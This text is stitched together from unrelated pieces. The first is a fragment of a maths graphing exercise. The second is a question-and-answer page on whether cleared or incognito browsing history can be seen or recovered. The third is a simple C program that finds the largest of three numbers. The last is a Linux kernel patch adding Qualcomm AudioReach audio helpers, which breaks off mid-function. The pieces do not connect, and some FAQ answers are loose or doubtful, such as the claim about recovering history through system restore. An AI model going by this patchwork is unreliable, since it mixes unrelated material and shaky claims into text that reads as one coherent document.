Mark the auxiliary points, plotting only those that fit within the scale of our coordinate system, i.e. (−2; −4) and (0; −4). Draw and label the graph of the function.
[Figure: the graph of the function y = −3x² − 6x − 4]
Quick Answer: Is Your Browsing History Really Deleted?
What happens when you clear your browsing history?
Clearing your browsing history deletes the following:
• Web addresses you've visited are removed from the History page.
• Shortcuts to those pages are removed from the New Tab page.
• Address bar predictions for those websites are no longer shown.
Can Internet providers see incognito history?
Unfortunately, private browsing mode won’t help you there, contrary to what many internet users think. … While incognito mode doesn’t store your browsing history, temporary files, or cookies from session to session, it can’t shield you from everything. Your internet service provider (ISP) can see your activity.
Can anyone see my Google search history?
You might not know it, but Google keeps a record every time you use Google to perform an online search. Although an individual person would have to know the password for your Google account to access it, Google maintains a history of your queries and must allow access to it if a court order is obtained.
Can police recover deleted search history?
So, can police recover deleted pictures, texts, and files from a phone? The answer is yes: by using special tools, they can find data that hasn't been overwritten yet. However, by using encryption methods, you can ensure your data is kept private, even after deletion.
Can my parents see my incognito history?
Your parents cannot see what you did in Incognito (unless you forgot to close the tab or simply left it open), because Incognito keeps no history. However, whatever you do on the internet, the data still goes to your internet service provider.
How do I permanently delete my phone history?
Delete all activity:
1. On your Android phone or tablet, open your device's Settings app > Google > Manage your Google Account.
2. At the top, tap Data & personalization.
3. Under "Activity and timeline," tap My Activity.
4. To the right of the search bar, tap More > Delete activity by.
5. Below "Delete Activity," tap All time.
6. Tap Delete.
How do I permanently delete my history on my iPhone?
Clear the history and cookies from Safari on your iPhone, iPad, or iPod touch:
• To clear your history and cookies, go to Settings > Safari, and tap Clear History and Website Data.
• To clear your cookies and keep your history, go to Settings > Safari > Advanced > Website Data, then tap Remove All Website Data.
Can browsing history be deleted permanently?
If you don’t want a record of webpages you’ve visited using Chrome, you can delete all or some of your browsing history. If you delete your browsing history, it’ll take effect on all devices where you’ve turned sync on and signed in to Chrome. Your history will be removed from Chrome.
Can anyone see your deleted history?
Even though the folder is gone from the direct view of unwanted people, the documents still exist and can easily be found with a bit of extra effort. In technical terms, your deleted browsing history can be recovered by unauthorized parties, even after you have cleared it.
Can deleted history be recovered?
The easiest method is to do a system restore. If the internet history was deleted recently, a system restore will recover it. To get system restore up and running, go to the Start menu and search for "system restore", which will take you to the feature.
Can you track incognito browsing?
If you sign in to any website in Incognito mode, that site will know that you're the one browsing and can keep track of your activities from that moment on. Incognito mode also does not prevent your activity or location from being visible to the websites you visit, your school or employer, or your internet service provider.
Program for the Greatest of 3 Numbers
Explanation:
We want to find the number that is greater than the other two. Take 3 variables and compare each one with the other two; the block whose condition is satisfied will be executed. (The comparisons assume the three numbers are distinct.)
code:
#include <stdio.h>

int main(void)
{
    int a, b, c;

    printf("\n Enter 3 Numbers:");
    scanf("%d%d%d", &a, &b, &c);

    if (a > b && a > c)        /* a is greater than both b and c */
    {
        printf("%d is greatest", a);
    }
    else if (b > a && b > c)   /* b is greater than both a and c */
    {
        printf("%d is greatest", b);
    }
    else                       /* otherwise it must be c */
    {
        printf("%d is greatest", c);
    }

    return 0;
}
Output:
Enter 3 Numbers:12
54
32
54 is greatest
diff mbox series
[RFC,06/13] ASoC: qcom: audioreach: add module configuration command helpers
Message ID [email protected] (mailing list archive)
State New, archived
Series ASoC: qcom: Add AudioReach support | expand
Commit Message
Srinivas Kandagatla June 7, 2021, 3:28 p.m. UTC
Audioreach module configuration helpers, which will be used by the q6apm-dai driver.
Signed-off-by: Srinivas Kandagatla <[email protected]>
---
sound/soc/qcom/audioreach/audioreach.c | 551 +++++++++++++++++++++++++
sound/soc/qcom/audioreach/audioreach.h | 16 +
sound/soc/qcom/audioreach/q6apm.c | 265 ++++++++++++
3 files changed, 832 insertions(+)
diff --git a/sound/soc/qcom/audioreach/audioreach.c b/sound/soc/qcom/audioreach/audioreach.c
index 7291adb37d49..eecea02f93bd 100644
--- a/sound/soc/qcom/audioreach/audioreach.c
+++ b/sound/soc/qcom/audioreach/audioreach.c
@@ -529,3 +529,554 @@ void *audioreach_alloc_graph_pkt(struct q6apm *apm,
return pkt;
}
+int audioreach_graph_send_cmd_sync(struct q6apm_graph *graph,
+ struct gpr_pkt *pkt,
+ uint32_t rsp_opcode)
+{
+
+ struct device *dev = graph->dev;
+ struct gpr_hdr *hdr = &pkt->hdr;
+ int rc;
+
+ mutex_lock(&graph->cmd_lock);
+ graph->result.opcode = 0;
+ graph->result.status = 0;
+
+ rc = gpr_send_port_pkt(graph->port, pkt);
+ if (rc < 0)
+ goto err;
+
+ if (rsp_opcode)
+ rc = wait_event_timeout(graph->cmd_wait,
+ (graph->result.opcode == hdr->opcode) ||
+ (graph->result.opcode == rsp_opcode),
+ 5 * HZ);
+ else
+ rc = wait_event_timeout(graph->cmd_wait,
+ (graph->result.opcode == hdr->opcode),
+ 5 * HZ);
+
+ if (!rc) {
+ dev_err(dev, "CMD timeout for [%x] opcode\n", hdr->opcode);
+ rc = -ETIMEDOUT;
+ } else if (graph->result.status > 0) {
+ dev_err(dev, "DSP returned error[%x] %x\n", hdr->opcode,
+ graph->result.status);
+ rc = -EINVAL;
+ } else {
+ dev_err(dev, "DSP returned [%x]\n", graph->result.status);
+ rc = 0;
+ }
+
+err:
+ mutex_unlock(&graph->cmd_lock);
+ return rc;
+}
+EXPORT_SYMBOL_GPL(audioreach_graph_send_cmd_sync);
+
+static int audioreach_codec_dma_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t num_channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct apm_module_param_data *param_data;
+ struct apm_codec_dma_module_intf_cfg *intf_cfg;
+ struct apm_module_hw_ep_mf_cfg *hw_cfg;
+ struct apm_module_frame_size_factor_cfg *fs_cfg;
+ struct apm_module_hw_ep_power_mode_cfg *pm_cfg;
+ int ic_sz, ep_sz, fs_sz, pm_sz, dl_sz;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ ic_sz = APM_CDMA_INTF_CFG_PSIZE;
+ ep_sz = APM_HW_EP_CFG_PSIZE;
+ fs_sz = APM_FS_CFG_PSIZE;
+ pm_sz = APM_HW_EP_PMODE_CFG_PSIZE;
+ dl_sz = 0;
+
+ payload_size = ic_sz + ep_sz + fs_sz + pm_sz + dl_sz;
+
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+
+ hw_cfg = p;
+ param_data = &hw_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_MF_CFG;
+ param_data->param_size = ep_sz - APM_MODULE_PARAM_DATA_SIZE;
+
+ hw_cfg->mf.sample_rate = rate;
+ hw_cfg->mf.bit_width = bits_per_sample;
+ hw_cfg->mf.num_channels = num_channels;
+ hw_cfg->mf.data_format = module->data_format;
+ p += ep_sz;
+
+ fs_cfg = p;
+ param_data = &fs_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_FRAME_SIZE_FACTOR;
+ param_data->param_size = fs_sz - APM_MODULE_PARAM_DATA_SIZE;
+ fs_cfg->frame_size_factor = 1;
+ p += fs_sz;
+
+ intf_cfg = p;
+ param_data = &intf_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_CODEC_DMA_INTF_CFG;
+ param_data->param_size = ic_sz - APM_MODULE_PARAM_DATA_SIZE;
+
+ intf_cfg->cfg.lpaif_type = module->hw_interface_type;
+ intf_cfg->cfg.intf_index = module->hw_interface_idx;
+ intf_cfg->cfg.active_channels_mask = (1 << num_channels) - 1;
+ p += ic_sz;
+
+ pm_cfg = p;
+ param_data = &pm_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_POWER_MODE_CFG;
+ param_data->param_size = pm_sz - APM_MODULE_PARAM_DATA_SIZE;
+ pm_cfg->power_mode.power_mode = 0;
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_i2s_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t num_channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct apm_module_frame_size_factor_cfg *fs_cfg;
+ struct apm_module_param_data *param_data;
+ struct apm_i2s_module_intf_cfg *intf_cfg;
+ struct apm_module_hw_ep_mf_cfg *hw_cfg;
+ int ic_sz, ep_sz, fs_sz;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ ic_sz = APM_I2S_INTF_CFG_PSIZE;
+ ep_sz = APM_HW_EP_CFG_PSIZE;
+ fs_sz = APM_FS_CFG_PSIZE;
+
+ payload_size = ic_sz + ep_sz + fs_sz;
+
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+ intf_cfg = p;
+
+ param_data = &intf_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_I2S_INTF_CFG;
+ param_data->param_size = ic_sz - APM_MODULE_PARAM_DATA_SIZE;
+
+ intf_cfg->cfg.intf_idx = module->hw_interface_idx;
+ intf_cfg->cfg.sd_line_idx = module->sd_line_idx;
+ intf_cfg->cfg.ws_src = module->ws_src;
+
+ p += ic_sz;
+ hw_cfg = p;
+ param_data = &hw_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_MF_CFG;
+ param_data->param_size = ep_sz - APM_MODULE_PARAM_DATA_SIZE;
+
+ hw_cfg->mf.sample_rate = rate;
+ hw_cfg->mf.bit_width = bits_per_sample;
+ hw_cfg->mf.num_channels = num_channels;
+ hw_cfg->mf.data_format = module->data_format;
+
+ p += ep_sz;
+ fs_cfg = p;
+ param_data = &fs_cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_HW_EP_FRAME_SIZE_FACTOR;
+ param_data->param_size = fs_sz - APM_MODULE_PARAM_DATA_SIZE;
+ fs_cfg->frame_size_factor = 1;
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_logging_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module)
+{
+ struct apm_module_param_data *param_data;
+ struct data_logging_config *cfg;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ payload_size = sizeof(*cfg) + APM_MODULE_PARAM_DATA_SIZE;
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+
+ param_data = p;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_DATA_LOGGING_CONFIG;
+ param_data->param_size = payload_size - APM_MODULE_PARAM_DATA_SIZE;
+
+ p = p + APM_MODULE_PARAM_DATA_SIZE;
+ cfg = p;
+ cfg->log_code = module->log_code;
+ cfg->log_tap_point_id = module->log_tap_point_id;
+ cfg->mode = module->mode;
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_pcm_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t num_channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct apm_pcm_module_media_fmt_cmd *cfg;
+ struct apm_module_param_data *param_data;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ payload_size = APM_PCM_MODULE_FMT_CMD_PSIZE(num_channels);
+
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+ cfg = p;
+
+ param_data = &cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_PCM_OUTPUT_FORMAT_CFG;
+ param_data->param_size = payload_size - APM_MODULE_PARAM_DATA_SIZE;
+
+ cfg->header.data_format = DATA_FORMAT_FIXED_POINT;
+ cfg->header.fmt_id = MEDIA_FMT_ID_PCM;
+ cfg->header.payload_size = APM_PCM_OUT_FMT_CFG_PSIZE(num_channels);
+
+ cfg->media_cfg.alignment = PCM_LSB_ALIGNED;
+ cfg->media_cfg.bit_width = bits_per_sample;
+ cfg->media_cfg.endianness = PCM_LITTLE_ENDIAN;
+ cfg->media_cfg.interleaved = module->interleave_type;
+ cfg->media_cfg.num_channels = num_channels;
+ cfg->media_cfg.q_factor = bits_per_sample - 1;
+ cfg->media_cfg.bits_per_sample = bits_per_sample;
+
+ if (num_channels == 1) {
+ cfg->media_cfg.channel_mapping[0] = PCM_CHANNEL_L;
+ } else if (num_channels == 2) {
+ cfg->media_cfg.channel_mapping[0] = PCM_CHANNEL_L;
+ cfg->media_cfg.channel_mapping[1] = PCM_CHANNEL_R;
+ } else {
+ dev_err(graph->dev, "Error: Invalid channels (%d)!\n", num_channels);
+ }
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_shmem_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t num_channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct apm_module_param_data *param_data;
+ struct payload_media_fmt_pcm *cfg;
+ struct media_format *header;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ if (num_channels < 0 || num_channels > 2)
+ dev_err(graph->dev, "Error: Invalid channels (%d)!\n", num_channels);
+
+ payload_size = APM_SHMEM_FMT_CFG_PSIZE(num_channels) + APM_MODULE_PARAM_DATA_SIZE;
+
+ p = audioreach_alloc_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0,
+ graph->port->id, module->instance_id);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+
+ param_data = p;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = PARAM_ID_MEDIA_FORMAT;
+ param_data->param_size = payload_size - APM_MODULE_PARAM_DATA_SIZE;
+ p = p + APM_MODULE_PARAM_DATA_SIZE;
+
+ header = p;
+ header->data_format = DATA_FORMAT_FIXED_POINT;
+ header->fmt_id = MEDIA_FMT_ID_PCM;
+ header->payload_size = payload_size - sizeof(*header);
+
+ p = p + sizeof(*header);
+ cfg = p;
+ cfg->sample_rate = rate;
+ cfg->bit_width = bits_per_sample;
+ cfg->alignment = PCM_LSB_ALIGNED;
+ cfg->bits_per_sample = bits_per_sample;
+ cfg->q_factor = bits_per_sample - 1;
+ cfg->endianness = PCM_LITTLE_ENDIAN;
+ cfg->num_channels = num_channels;
+
+ if (num_channels == 1) {
+ cfg->channel_mapping[0] = PCM_CHANNEL_L;
+ } else if (num_channels == 2) {
+ cfg->channel_mapping[0] = PCM_CHANNEL_L;
+ cfg->channel_mapping[1] = PCM_CHANNEL_R;
+ } else {
+ dev_err(graph->dev, "Error: Invalid channels (%d)!\n", num_channels);
+ }
+
+ rc = audioreach_graph_send_cmd_sync(graph, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+static int audioreach_gain_set(struct q6apm_graph *graph,
+ struct audioreach_module *module)
+{
+ struct apm_module_param_data *param_data;
+ struct apm_gain_module_cfg *cfg;
+ int rc, payload_size;
+ struct gpr_pkt *pkt;
+ void *p;
+
+ payload_size = APM_GAIN_CFG_PSIZE;
+ p = audioreach_alloc_apm_cmd_pkt(payload_size, APM_CMD_SET_CFG, 0);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+ cfg = p;
+
+ param_data = &cfg->param_data;
+ param_data->module_instance_id = module->instance_id;
+ param_data->error_code = 0;
+ param_data->param_id = APM_PARAM_ID_GAIN;
+ param_data->param_size = payload_size - APM_MODULE_PARAM_DATA_SIZE;
+
+ cfg->gain_cfg.gain = module->gain;
+
+ rc = q6apm_send_cmd_sync(graph->apm, pkt, 0);
+
+ kfree(pkt);
+
+ return rc;
+}
+
+int audioreach_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ int rc;
+
+ switch (module->module_id) {
+ case MODULE_ID_DATA_LOGGING:
+ rc = audioreach_logging_set_media_format(graph, module);
+ break;
+ case MODULE_ID_PCM_DEC:
+ case MODULE_ID_PCM_ENC:
+ case MODULE_ID_PCM_CNV:
+ rc = audioreach_pcm_set_media_format(graph, module,
+ direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ break;
+ case MODULE_ID_I2S_SINK:
+ rc = audioreach_i2s_set_media_format(graph, module,
+ direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ break;
+ case MODULE_ID_WR_SHARED_MEM_EP:
+ rc = audioreach_shmem_set_media_format(graph, module,
+ direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ break;
+ case MODULE_ID_GAIN:
+ rc = audioreach_gain_set(graph, module);
+ break;
+ case MODULE_ID_CODEC_DMA_SINK:
+ case MODULE_ID_CODEC_DMA_SOURCE:
+ rc = audioreach_codec_dma_set_media_format(graph, module,
+ direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ break;
+ default:
+ rc = 0;
+ }
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(audioreach_set_media_format);
+
+void audioreach_graph_free_buf(struct q6apm_graph *graph)
+{
+ struct audioreach_graph_data *port;
+ unsigned long flags;
+
+ spin_lock_irqsave(&graph->lock, flags);
+ port = &graph->rx_data;
+ port->num_periods = 0;
+ kfree(port->buf);
+ port->buf = NULL;
+
+ port = &graph->tx_data;
+ port->num_periods = 0;
+ kfree(port->buf);
+ port->buf = NULL;
+ spin_unlock_irqrestore(&graph->lock, flags);
+}
+EXPORT_SYMBOL_GPL(audioreach_graph_free_buf);
+
+int audioreach_map_memory_regions(struct q6apm_graph *graph,
+ unsigned int dir, size_t period_sz,
+ unsigned int periods,
+ bool is_contiguous)
+{
+ struct apm_shared_map_region_payload *mregions;
+ struct apm_cmd_shared_mem_map_regions *cmd;
+ uint32_t num_regions, buf_sz, payload_size;
+ struct audioreach_graph_data *data;
+ struct audio_buffer *ab;
+ unsigned long flags;
+ struct gpr_pkt *pkt;
+ void *p;
+ int rc, i;
+
+ if (dir == SNDRV_PCM_STREAM_PLAYBACK)
+ data = &graph->rx_data;
+ else
+ data = &graph->tx_data;
+
+ if (is_contiguous) {
+ num_regions = 1;
+ buf_sz = period_sz * periods;
+ } else {
+ buf_sz = period_sz;
+ num_regions = periods;
+ }
+
+ /* DSP expects size should be aligned to 4K */
+ buf_sz = ALIGN(buf_sz, 4096);
+
+ payload_size = sizeof(*cmd) + (sizeof(*mregions) * num_regions);
+
+ p = audioreach_alloc_apm_pkt(payload_size,
+ APM_CMD_SHARED_MEM_MAP_REGIONS, dir,
+ graph->port->id);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE;
+ cmd = p;
+ cmd->mem_pool_id = APM_MEMORY_MAP_SHMEM8_4K_POOL;
+ cmd->num_regions = num_regions;
+
+ cmd->property_flag = 0x0;
+
+ mregions = p + sizeof(*cmd);
+
+ spin_lock_irqsave(&graph->lock, flags);
+
+ for (i = 0; i < num_regions; i++) {
+ ab = &data->buf[i];
+ mregions->shm_addr_lsw = lower_32_bits(ab->phys);
+ mregions->shm_addr_msw = upper_32_bits(ab->phys);
+ mregions->mem_size_bytes = buf_sz;
+ ++mregions;
+ }
+ spin_unlock_irqrestore(&graph->lock, flags);
+
+ rc = audioreach_graph_send_cmd_sync(graph, pkt,
+ APM_CMD_RSP_SHARED_MEM_MAP_REGIONS);
+
+ kfree(pkt);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(audioreach_map_memory_regions);
+
+int audioreach_shared_memory_send_eos(struct q6apm_graph *graph)
+{
+ struct data_cmd_wr_sh_mem_ep_eos *eos;
+ struct gpr_pkt *pkt;
+ int rc = 0, iid;
+ void *p;
+
+ iid = q6apm_graph_get_rx_shmem_module_iid(graph);
+ p = audioreach_alloc_cmd_pkt(sizeof(*eos),
+ DATA_CMD_WR_SH_MEM_EP_EOS,
+ 0,
+ graph->port->id, iid);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ eos = p + GPR_HDR_SIZE + APM_CMD_HDR_SIZE;
+
+ eos->policy = WR_SH_MEM_EP_EOS_POLICY_LAST;
+
+ rc = gpr_send_port_pkt(graph->port, pkt);
+ kfree(pkt);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(audioreach_shared_memory_send_eos);
diff --git a/sound/soc/qcom/audioreach/audioreach.h b/sound/soc/qcom/audioreach/audioreach.h
index e5736fdda66b..07423369cc84 100644
--- a/sound/soc/qcom/audioreach/audioreach.h
+++ b/sound/soc/qcom/audioreach/audioreach.h
@@ -627,4 +627,20 @@ void *audioreach_alloc_pkt(int pkt_size, uint32_t opcode, uint32_t token,
void *audioreach_alloc_graph_pkt(struct q6apm *apm,
struct list_head *sg_list,
int graph_id);
+/* Module specific */
+void audioreach_graph_free_buf(struct q6apm_graph *graph);
+int audioreach_map_memory_regions(struct q6apm_graph *graph,
+ unsigned int dir, size_t period_sz,
+ unsigned int periods,
+ bool is_contiguous);
+int audioreach_graph_send_cmd_sync(struct q6apm_graph *graph,
+ struct gpr_pkt *pkt,
+ uint32_t rsp_opcode);
+int audioreach_set_media_format(struct q6apm_graph *graph,
+ struct audioreach_module *module,
+ int direction, uint32_t rate,
+ uint32_t channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample);
+int audioreach_shared_memory_send_eos(struct q6apm_graph *graph);
#endif /* __AUDIOREACH_H__ */
diff --git a/sound/soc/qcom/audioreach/q6apm.c b/sound/soc/qcom/audioreach/q6apm.c
index d0deb69114b0..6a98c114ea7a 100644
--- a/sound/soc/qcom/audioreach/q6apm.c
+++ b/sound/soc/qcom/audioreach/q6apm.c
@@ -309,6 +309,172 @@ int q6apm_connect_sub_graphs(struct q6apm *apm, u32 src_sgid,
return 0;
}
+int q6apm_graph_media_format_shmem(struct q6apm_graph *graph,
+ int direction, uint32_t rate,
+ uint32_t channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct audioreach_module *module;
+
+ if (direction == SNDRV_PCM_STREAM_CAPTURE)
+ module = q6apm_find_module_by_mid(graph,
+ MODULE_ID_RD_SHARED_MEM_EP);
+ else
+ module = q6apm_find_module_by_mid(graph,
+ MODULE_ID_WR_SHARED_MEM_EP);
+
+ if (!module)
+ return -ENODEV;
+
+ audioreach_set_media_format(graph, module, direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+
+ return 0;
+
+}
+EXPORT_SYMBOL_GPL(q6apm_graph_media_format_shmem);
+
+int q6apm_map_memory_regions(struct q6apm_graph *graph,
+ unsigned int dir, phys_addr_t phys,
+ size_t period_sz, unsigned int periods)
+{
+ struct audioreach_graph_data *data;
+ struct audio_buffer *buf;
+ unsigned long flags;
+ int cnt;
+ int rc;
+
+ if (dir == SNDRV_PCM_STREAM_PLAYBACK)
+ data = &graph->rx_data;
+ else
+ data = &graph->tx_data;
+
+ spin_lock_irqsave(&graph->lock, flags);
+
+ if (data->buf) {
+ dev_err(graph->dev, "Buffer already allocated\n");
+ spin_unlock_irqrestore(&graph->lock, flags);
+ return 0;
+ }
+
+ buf = kzalloc(((sizeof(struct audio_buffer)) * periods), GFP_ATOMIC);
+ if (!buf) {
+ spin_unlock_irqrestore(&graph->lock, flags);
+ return -ENOMEM;
+ }
+
+ if (dir == SNDRV_PCM_STREAM_PLAYBACK)
+ data = &graph->rx_data;
+ else
+ data = &graph->tx_data;
+
+ data->buf = buf;
+
+ buf[0].phys = phys;
+ buf[0].size = period_sz;
+
+ for (cnt = 1; cnt < periods; cnt++) {
+ if (period_sz > 0) {
+ buf[cnt].phys = buf[0].phys + (cnt * period_sz);
+ buf[cnt].size = period_sz;
+ }
+ }
+ data->num_periods = periods;
+
+ spin_unlock_irqrestore(&graph->lock, flags);
+
+ rc = audioreach_map_memory_regions(graph, dir, period_sz,
+ periods, 1);
+ if (rc < 0) {
+ dev_err(graph->dev, "Memory_map_regions failed\n");
+ audioreach_graph_free_buf(graph);
+ }
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(q6apm_map_memory_regions);
+
+int q6apm_unmap_memory_regions(struct q6apm_graph *graph,
+ unsigned int dir)
+{
+ struct audioreach_graph_data *data;
+ struct apm_cmd_shared_mem_unmap_regions *cmd = NULL;
+ struct gpr_pkt *pkt;
+ void *p;
+ int rc;
+
+ if (dir == SNDRV_PCM_STREAM_PLAYBACK)
+ data = &graph->rx_data;
+ else
+ data = &graph->tx_data;
+
+ if (!data->mem_map_handle) {
+ return 0;
+ }
+
+ p = audioreach_alloc_apm_pkt(sizeof(*cmd),
+ APM_CMD_SHARED_MEM_UNMAP_REGIONS, dir,
+ graph->port->id);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ cmd = p + GPR_HDR_SIZE;
+ cmd->mem_map_handle = data->mem_map_handle;
+
+ rc = audioreach_graph_send_cmd_sync(graph, pkt, APM_CMD_SHARED_MEM_UNMAP_REGIONS);
+ kfree(pkt);
+
+ audioreach_graph_free_buf(graph);
+
+ return rc;
+}
+EXPORT_SYMBOL_GPL(q6apm_unmap_memory_regions);
+
+int q6apm_graph_media_format_pcm(struct q6apm_graph *graph,
+ int direction, uint32_t rate,
+ uint32_t channels,
+ u8 channel_map[PCM_MAX_NUM_CHANNEL],
+ uint16_t bits_per_sample)
+{
+ struct audioreach_graph_info *info = graph->info;
+ struct audioreach_sub_graph *sgs;
+ struct audioreach_container *container;
+ struct audioreach_module *module;
+
+ list_for_each_entry(sgs, &info->sg_list, node) {
+ list_for_each_entry(container, &sgs->container_list, node) {
+ list_for_each_entry(module, &container->modules_list, node) {
+				if ((MODULE_ID_WR_SHARED_MEM_EP == module->module_id) ||
+				    (MODULE_ID_RD_SHARED_MEM_EP == module->module_id))
+ continue;
+
+ audioreach_set_media_format(graph, module, direction, rate,
+ channels, channel_map,
+ bits_per_sample);
+ }
+ }
+ }
+
+ return 0;
+
+}
+EXPORT_SYMBOL_GPL(q6apm_graph_media_format_pcm);
+
+static int q6apm_graph_get_tx_shmem_module_iid(struct q6apm_graph *graph)
+{
+ struct audioreach_module *module;
+
+ module = q6apm_find_module_by_mid(graph, MODULE_ID_RD_SHARED_MEM_EP);
+ if (!module)
+ return -ENODEV;
+
+ return module->instance_id;
+
+}
+
int q6apm_graph_get_rx_shmem_module_iid(struct q6apm_graph *graph)
{
struct audioreach_module *module;
@@ -322,6 +488,105 @@ int q6apm_graph_get_rx_shmem_module_iid(struct q6apm_graph *graph)
}
EXPORT_SYMBOL_GPL(q6apm_graph_get_rx_shmem_module_iid);
+int q6apm_write_async(struct q6apm_graph *graph, uint32_t len, uint32_t msw_ts,
+ uint32_t lsw_ts, uint32_t wflags)
+{
+ struct gpr_pkt *pkt;
+ void *p;
+ int rc, payload_size, iid;
+ struct apm_data_cmd_wr_sh_mem_ep_data_buffer_v2 *write;
+ struct audio_buffer *ab;
+ unsigned long flags;
+
+ payload_size = sizeof(*write);
+
+ iid = q6apm_graph_get_rx_shmem_module_iid(graph);
+ p = audioreach_alloc_pkt(payload_size,
+ DATA_CMD_WR_SH_MEM_EP_DATA_BUFFER_V2,
+ graph->rx_data.dsp_buf,
+ graph->port->id, iid);
+ if (IS_ERR(p))
+ return -ENOMEM;
+
+ pkt = p;
+ p = p + GPR_HDR_SIZE;
+ write = p;
+
+ spin_lock_irqsave(&graph->lock, flags);
+ ab = &graph->rx_data.buf[graph->rx_data.dsp_buf];
+
+ write->buf_addr_lsw = lower_32_bits(ab->phys);
+ write->buf_addr_msw = upper_32_bits(ab->phys);
+ write->buf_size = len;
+ write->timestamp_lsw = lsw_ts;
+ write->timestamp_msw = msw_ts;
+ write->mem_map_handle = graph->rx_data.mem_map_handle;
+
+ //FIXME use other flags
+ if (wflags == NO_TIMESTAMP)
+ write->flags = 0;
+ else
+ write->flags = 0x80000000;
+
+ graph->rx_data.dsp_buf++;
+
+ if (graph->rx_data.dsp_buf >= graph->rx_data.num_periods)
+ graph->rx_data.dsp_buf = 0;
+
+ spin_unlock_irqrestore(&graph->lock, flags);
+
+ rc = gpr_send_port_pkt(graph->port, pkt);
+
